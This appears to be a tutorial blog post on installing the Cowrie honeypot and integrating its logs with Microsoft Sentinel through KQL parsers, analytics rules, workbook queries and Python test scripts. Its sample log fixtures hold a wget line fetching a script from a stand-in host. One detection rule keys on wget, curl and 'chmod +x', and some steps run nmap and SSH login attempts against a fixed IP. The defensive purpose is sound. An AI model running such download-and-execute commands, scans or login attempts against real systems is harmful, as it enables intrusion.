
Cowrie honeypot and its Integration with Microsoft Sentinel.

by info.odysseyx@gmail.com


Cowrie is an advanced honeypot designed to attract, detect, and analyze malicious activity by emulating Secure Shell (SSH) and Telnet services. Honeypots like Cowrie are a type of cybersecurity tool used to create controlled environments that mimic real systems in order to lure attackers. When an attacker interacts with Cowrie, their activity is logged in JSON format, providing valuable insight into the attack method and motivation.

Cowrie's main features

  1. SSH and Telnet emulation: Cowrie simulates the SSH and Telnet services that attackers commonly target when seeking unauthorized access to systems.
  2. Detailed logging: Cowrie captures detailed logs of attempted commands, executed commands, and interaction patterns. This helps you understand the methodologies and tools attackers use.
  3. File and command logging: In addition to logging commands, Cowrie logs files uploaded and downloaded by attackers, providing a comprehensive view of activity.
  4. Interactive session support: Cowrie simulates an interactive command-line session, allowing you to capture more detailed information about attacker behavior.
  5. Dynamic configuration: Cowrie's configuration can be tailored to mimic a variety of environments and settings, making it effective in many different scenarios.

Why use Cowrie?

  1. Threat intelligence
    Cowrie provides valuable insight into attack trends and techniques. By observing and analyzing attackers' interactions with the honeypot, security teams can gather information about attack vectors, tools, and methodologies. This intelligence is important for improving security measures and defenses.
  2. Detect unknown threats
    Honeypots like Cowrie can detect and log unknown or new threats that existing security controls do not catch. Because attackers interact directly with the honeypot, defenders can observe new vulnerabilities and attack methods before they affect real systems.
  3. Improved security posture
    By studying the data collected by Cowrie, organizations can strengthen their security posture. This includes improving intrusion detection systems (IDS), updating firewall rules, and improving overall security policies based on real data collected from the honeypot.
  4. Low-risk deployment
    Because Cowrie simulates services rather than exposing a real production environment, the inherent risk is low. Malicious activity targeting the honeypot does not affect actual production systems, making it a safe and controlled way to study attacks.

Conclusion

Cowrie is a powerful and versatile tool for cybersecurity professionals looking to understand and combat malicious activity targeting SSH and Telnet services. By deploying Cowrie, organizations can gain critical insights into attack patterns, detect new threats, and improve their overall security posture while maintaining a low-risk environment for research and analysis.


Integrate Cowrie honeypot with Microsoft Sentinel (SIEM and SOAR)

Integrating Cowrie with Microsoft Sentinel offers several benefits to strengthen your cybersecurity operations. Microsoft Sentinel is a cloud-based security information and event management (SIEM) service that delivers intelligent security analytics and threat intelligence across the enterprise. By combining Cowrie’s detailed honeypot data with Sentinel’s advanced analytics and automation capabilities, organizations can achieve a more comprehensive and effective security posture.
The integration described below covers analytics rules, threat hunting, automation, workbooks, and custom parsers.



Step-by-step guide to installing Cowrie on Linux:

GitHub: cowrie/cowrie (Cowrie SSH/Telnet honeypot). Documentation: https://cowrie.readthedocs.io

  1. System update

Start by updating your package list and upgrading existing packages.

sudo apt update && sudo apt upgrade -y

  2. Install required dependencies

Install the packages and libraries required by Cowrie.

sudo apt install -y python3-pip python3-venv python3-dev libssl-dev libffi-dev build-essential git

  3. Create a Cowrie user

Create a dedicated, unprivileged user to run Cowrie.

sudo adduser --disabled-password --gecos 'Cowrie' cowrie

  4. Become the Cowrie user

Switch to the Cowrie user account.

sudo -u cowrie -i

  5. Clone the Cowrie repository

Clone the Cowrie GitHub repository into the Cowrie user's home directory.

git clone https://github.com/cowrie/cowrie.git

Go to the Cowrie directory.

cd cowrie

  6. Set up a Python virtual environment

Create and activate a Python virtual environment within the Cowrie directory.

python3 -m venv cowrie-env

source cowrie-env/bin/activate

  7. Install Cowrie's Python dependencies

Install the required Python packages using pip.

pip install -r requirements.txt

  8. Configure Cowrie

Copy the sample configuration files to create your own configuration.

cp cowrie.cfg.sample cowrie.cfg

cp userdb.txt.sample userdb.txt

Edit cowrie.cfg to adjust settings as needed. For basic usage, you may not need to change anything at first. Use a text editor like nano.

nano cowrie.cfg

  9. Start Cowrie

Start Cowrie using the provided startup script.

bin/cowrie start

You can stop Cowrie as follows:

bin/cowrie stop

And check the status using:

bin/cowrie status

  10. Check the installation

To check that Cowrie is running, look at the logs in the cowrie/log directory.

tail -f log/cowrie.log

Then connect to Cowrie from another machine (for example, from the Windows command prompt) and watch the corresponding entries appear in the log.

The following steps show how to exercise Cowrie's features and confirm that attacker activity is captured and logged.

  11. Connect to Cowrie

To interact with Cowrie, connect using SSH or Telnet. For example, if Cowrie is configured to listen for SSH on port 2222:

ssh -p 2222 root@172.210.56.197

  12. Explore Cowrie's features

Test authentication
  • Try different usernames and passwords: Cowrie logs all login attempts, including failed ones. To see how Cowrie logs these attempts, try common usernames such as root, administrator, or user with various passwords.
    ssh -p 2222 root@172.210.56.197
    ssh -p 2222 admin@172.210.56.197
    ssh -p 2222 user@172.210.56.197
  • Check the log: Cowrie records authentication attempts in a log file. Monitor var/log/cowrie.log to see how these attempts are logged.

Run commands
  • Try common commands: Once logged in, run common Unix commands to simulate normal or malicious activity, for example ls, whoami, uname -a.

File upload
  • Use SCP or SFTP (if configured): If Cowrie is set up to handle SCP or SFTP, try uploading a file.
    scp -P 2222 localfile.txt user@172.210.56.197:/tmp

Network interaction testing
  • Check open ports: Use a tool like nmap to scan Cowrie and see which ports it exposes.
    nmap -p- 172.210.56.197

Cowrie: Leveraging Microsoft Sentinel with a parser

To parse and normalize Cowrie logs in Microsoft Sentinel using the Kusto Query Language (KQL), you can create queries to extract and organize relevant information from the raw log data. Below is an example KQL query that parses Cowrie logs, assuming the logs are stored in a custom log type (e.g. newCowrie_CL).

KQL query for parsing Cowrie logs

The following KQL query parses log entries and displays them in normalized format. Adjust field names based on your actual log structure and requirements.

// Query to normalize and extract information from Cowrie logs
newCowrie_CL
| extend EventID = tostring(parse_json(RawData).eventid),
         URL = tostring(parse_json(RawData).url),
         Outfile = tostring(parse_json(RawData).outfile),
         SHA256 = tostring(parse_json(RawData).shasum),
         Sensor = tostring(parse_json(RawData).sensor),
         Message = tostring(parse_json(RawData).message),
         SourceIP = tostring(parse_json(RawData).src_ip),
         SessionID = tostring(parse_json(RawData).session)
| project EventID, URL, Outfile, SHA256, Sensor, Message, SourceIP, SessionID
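The same normalization can be checked offline before the logs ever reach Sentinel. The Python below is an added example written for this article, not code from the page or from the Cowrie project: it reads Cowrie's line-delimited JSON log and projects each record onto the same columns the KQL parser produces, with the KQL semantics that a missing field becomes an empty string rather than an error. The log lines, IPs, hostnames, session id and hash are constructed sample values, and the final line is deliberately truncated to show how a half-written tail line is handled.

```python
import json
from typing import Dict, Iterable, List, Optional

# Normalized column name (as in the KQL parser above) -> key in Cowrie's JSON record.
FIELD_MAP = {
    "EventID": "eventid",
    "URL": "url",
    "Outfile": "outfile",
    "SHA256": "shasum",
    "Sensor": "sensor",
    "Message": "message",
    "SourceIP": "src_ip",
    "SessionID": "session",
}

# Constructed sample records in the shape Cowrie writes to its JSON log.
# All values (IP, hostname, session id, hash) are made up for this example.
_SAMPLE_HASH = "0" * 64
_SAMPLE_RECORDS = [
    {"eventid": "cowrie.login.failed", "username": "root", "password": "123456",
     "message": "login attempt [root/123456] failed", "sensor": "honeypot-01",
     "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6",
     "timestamp": "2024-09-20T10:00:01.000000Z"},
    {"eventid": "cowrie.command.input", "input": "wget http://example.invalid/x.sh",
     "message": "CMD: wget http://example.invalid/x.sh", "sensor": "honeypot-01",
     "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6",
     "timestamp": "2024-09-20T10:00:05.000000Z"},
    {"eventid": "cowrie.session.file_download", "url": "http://example.invalid/x.sh",
     "outfile": "var/lib/cowrie/downloads/" + _SAMPLE_HASH, "shasum": _SAMPLE_HASH,
     "message": "Downloaded URL (http://example.invalid/x.sh)", "sensor": "honeypot-01",
     "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6",
     "timestamp": "2024-09-20T10:00:06.000000Z"},
]
# One valid JSON line per record, followed by a truncated line such as `tail -f`
# can deliver while Cowrie is still writing it.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in _SAMPLE_RECORDS) + "\n" + \
    '{"eventid":"cowrie.session.closed","src_ip":"203.0.113.7","ses'


def normalize_record(raw: str) -> Optional[Dict[str, str]]:
    """Parse one JSON line and project it onto the normalized columns.

    Mirrors tostring(parse_json(RawData).<key>): a key that is absent (or null)
    yields "" instead of failing, so every row has the same column set.
    Returns None for lines that are not a JSON object.
    """
    try:
        rec = json.loads(raw)
    except json.JSONDecodeError:
        return None
    if not isinstance(rec, dict):
        return None
    row = {}
    for column, key in FIELD_MAP.items():
        value = rec.get(key)
        row[column] = "" if value is None else str(value)
    return row


def normalize_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Normalize a whole log, skipping blank and malformed lines."""
    rows = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        row = normalize_record(line)
        if row is not None:
            rows.append(row)
    return rows


if __name__ == "__main__":
    for row in normalize_log(SAMPLE_LOG.splitlines()):
        print(row)
```

Running the script prints three normalized rows and silently drops the truncated fourth line; the same drop-or-accept decision is worth making explicit in the Sentinel ingestion path, because a parser that throws on a malformed line can stall a whole batch.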

Leveraging Microsoft Sentinel with Cowrie: Analysis Rules

Creating analysis rules in Microsoft Sentinel based on Cowrie logs can provide you with valuable insights into the security threats and activities captured by your honeypot. Below are some key use cases and corresponding KQL queries that can be used to create these analysis rules.

  1. Detect suspicious file downloads

Use case: Identify instances where files were downloaded from suspicious or known malicious URLs.

KQL query:

newCowrie_CL
| extend EventID = tostring(parse_json(RawData).eventid),
         URL = tostring(parse_json(RawData).url),
         SourceIP = tostring(parse_json(RawData).src_ip)
| where EventID == "cowrie.session.file_download"
| where URL contains "malicious-site.com" or URL contains "suspicious"
| project SourceIP, URL

  2. Alert on a high number of failed login attempts

Use case: Detect brute-force or password-guessing attacks by monitoring high volumes of failed login attempts.

KQL query:

newCowrie_CL
| extend EventID = tostring(parse_json(RawData).eventid),
         SourceIP = tostring(parse_json(RawData).src_ip)
| where EventID == "cowrie.login.failed"
| summarize FailedAttempts = count() by SourceIP
| where FailedAttempts > 2
| project SourceIP, FailedAttempts
| order by FailedAttempts desc

  3. Monitor abnormal file execution

Use case: Detect attempts to fetch and run files or scripts that are unusual for the environment.

KQL query:

newCowrie_CL
| extend EventID = tostring(parse_json(RawData).eventid),
         Command = tostring(parse_json(RawData).input),
         SourceIP = tostring(parse_json(RawData).src_ip)
| where EventID == "cowrie.command.input"
| where Command contains "wget" or Command contains "curl" or Command contains "chmod +x"
| project SourceIP, Command

  4. File upload and download detection

Use case: Monitor file uploads and downloads to detect potential data leaks or theft.

KQL query:

newCowrie_CL
| extend EventID = tostring(parse_json(RawData).eventid),
         URL = tostring(parse_json(RawData).url),
         SourceIP = tostring(parse_json(RawData).src_ip),
         Outfile = tostring(parse_json(RawData).outfile)
| where EventID in ("cowrie.session.file_upload", "cowrie.session.file_download")
| project EventID, SourceIP, URL, Outfile

Rule description: This rule helps you identify potentially malicious file transfers by monitoring file upload and download activity.

  5. Detect connection events

Use case: Track session events to detect unusual patterns of access or possible reconnaissance activity.

KQL query:

newCowrie_CL
| extend EventID = tostring(parse_json(RawData).eventid),
         SourceIP = tostring(parse_json(RawData).src_ip)
| where EventID == "cowrie.session.closed"
| project SourceIP

Leveraging Microsoft Sentinel with Cowrie: Workbook

An Azure Monitor workbook for Cowrie logs extracts and visualizes various aspects of the data using the Kusto Query Language (KQL). Below is a guide to building a comprehensive, dynamic workbook with a variety of visualizations and insights drawn from Cowrie logs.

  1. Overview dashboard

Purpose: Provides a high-level summary of all key indicators.

newCowrie_CL
| extend EventID = tostring(parse_json(RawData).eventid)
| summarize
    TotalEvents = count(),
    TotalSuccessfulLogins = countif(EventID == "cowrie.login.success"),
    TotalFailedLogins = countif(EventID == "cowrie.login.failed"),
    TotalFileUploads = countif(EventID == "cowrie.session.file_upload"),
    TotalFileDownloads = countif(EventID == "cowrie.session.file_download"),
    TotalCommands = countif(EventID == "cowrie.command.input"),
    TotalSessionClosed = countif(EventID == "cowrie.session.closed"),
    TotalSessionConnect = countif(EventID == "cowrie.session.connect")
| project
    TotalEvents,
    TotalSuccessfulLogins,
    TotalFailedLogins,
    TotalFileUploads,
    TotalFileDownloads,
    TotalCommands,
    TotalSessionClosed,
    TotalSessionConnect
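The analytics rules in the previous section and the overview totals above can be prototyped and tested on a local copy of the Cowrie JSON log before they are deployed as Sentinel rules. The Python below is an added example written for this article, not code from the page or from the Cowrie project: each function implements one of the rules (failed-login count per source above a threshold, downloads from URLs matching an indicator, download-or-execute command patterns, file transfers) and the last one reproduces the workbook's count()/countif() summary. The log lines, IPs, session ids and URLs are constructed sample values; field names (eventid, src_ip, input, url, outfile) follow Cowrie's JSON output as used in the queries on this page.

```python
import json
from collections import Counter
from typing import Dict, Iterable, List, Tuple

# Constructed Cowrie JSON log lines, one record per line. IPs, session ids and
# URLs are made-up sample values for this example.
SAMPLE_LINES = [
    '{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","session":"s1"}',
    '{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"s1","username":"root","password":"123456"}',
    '{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"s1","username":"root","password":"admin"}',
    '{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"s1","username":"admin","password":"admin"}',
    '{"eventid":"cowrie.login.success","src_ip":"203.0.113.7","session":"s1","username":"root","password":"root"}',
    '{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"s1","input":"uname -a"}',
    '{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"s1","input":"wget http://suspicious.example.invalid/x.sh"}',
    '{"eventid":"cowrie.session.file_download","src_ip":"203.0.113.7","session":"s1","url":"http://suspicious.example.invalid/x.sh","outfile":"var/lib/cowrie/downloads/sample"}',
    '{"eventid":"cowrie.session.closed","src_ip":"203.0.113.7","session":"s1"}',
    '{"eventid":"cowrie.session.connect","src_ip":"198.51.100.9","session":"s2"}',
    '{"eventid":"cowrie.login.failed","src_ip":"198.51.100.9","session":"s2","username":"user","password":"user"}',
    '{"eventid":"cowrie.login.failed","src_ip":"198.51.100.9","session":"s2","username":"user","password":"password"}',
    '{"eventid":"cowrie.session.closed","src_ip":"198.51.100.9","session":"s2"}',
]

Record = Dict[str, object]


def load_records(lines: Iterable[str]) -> List[Record]:
    """Parse line-delimited JSON, skipping blank or malformed lines."""
    records = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(rec, dict):
            records.append(rec)
    return records


def failed_logins_by_source(records: List[Record], threshold: int = 2) -> List[Tuple[str, int]]:
    """Rule 2: count cowrie.login.failed per source IP, keep sources strictly above
    the threshold, most attempts first (summarize ... | where > N | order by desc)."""
    counts = Counter(str(r.get("src_ip", "")) for r in records
                     if r.get("eventid") == "cowrie.login.failed")
    return sorted(((ip, n) for ip, n in counts.items() if n > threshold),
                  key=lambda t: (-t[1], t[0]))


def suspicious_downloads(records: List[Record],
                         indicators: Tuple[str, ...] = ("malicious-site.com", "suspicious")) -> List[Tuple[str, str]]:
    """Rule 1: file_download events whose URL contains an indicator. KQL `contains`
    is case-insensitive, so both sides are lower-cased here to match."""
    hits = []
    for r in records:
        if r.get("eventid") != "cowrie.session.file_download":
            continue
        url = str(r.get("url", ""))
        if any(ind.lower() in url.lower() for ind in indicators):
            hits.append((str(r.get("src_ip", "")), url))
    return hits


def suspicious_commands(records: List[Record],
                        patterns: Tuple[str, ...] = ("wget", "curl", "chmod +x")) -> List[Tuple[str, str]]:
    """Rule 3: command input containing a download-or-execute pattern."""
    hits = []
    for r in records:
        if r.get("eventid") != "cowrie.command.input":
            continue
        cmd = str(r.get("input", ""))
        if any(p.lower() in cmd.lower() for p in patterns):
            hits.append((str(r.get("src_ip", "")), cmd))
    return hits


def file_transfers(records: List[Record]) -> List[Tuple[str, str, str, str]]:
    """Rule 4: every upload or download with its source, URL and stored outfile."""
    wanted = {"cowrie.session.file_upload", "cowrie.session.file_download"}
    return [(str(r.get("eventid")), str(r.get("src_ip", "")),
             str(r.get("url", "")), str(r.get("outfile", "")))
            for r in records if r.get("eventid") in wanted]


def event_summary(records: List[Record]) -> Dict[str, int]:
    """Workbook overview: the count()/countif() totals from the query above."""
    by_type = Counter(str(r.get("eventid", "")) for r in records)
    return {
        "TotalEvents": len(records),
        "TotalSuccessfulLogins": by_type["cowrie.login.success"],
        "TotalFailedLogins": by_type["cowrie.login.failed"],
        "TotalFileUploads": by_type["cowrie.session.file_upload"],
        "TotalFileDownloads": by_type["cowrie.session.file_download"],
        "TotalCommands": by_type["cowrie.command.input"],
        "TotalSessionClosed": by_type["cowrie.session.closed"],
        "TotalSessionConnect": by_type["cowrie.session.connect"],
    }


if __name__ == "__main__":
    recs = load_records(SAMPLE_LINES)
    print("Brute-force sources:", failed_logins_by_source(recs))
    print("Suspicious downloads:", suspicious_downloads(recs))
    print("Suspicious commands:", suspicious_commands(recs))
    print("File transfers:", file_transfers(recs))
    print("Summary:", event_summary(recs))
```

On the sample data only 203.0.113.7 crosses the "> 2" failed-login threshold; 198.51.100.9, with exactly two failures, does not, which is the same boundary the KQL rule draws. Raising or lowering the threshold parameter is the local equivalent of tuning the rule in Sentinel, and testing it against a saved log is a cheap way to see how many alerts a given value would have produced.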


Microsoft Global Hackathon 2024 – Cowrie-Sentinel Integration: introduction and technology deep dive

Hackathon 2024 – Cowrie-Sentinel Integration(20-09-2024 22-09-17).wmv




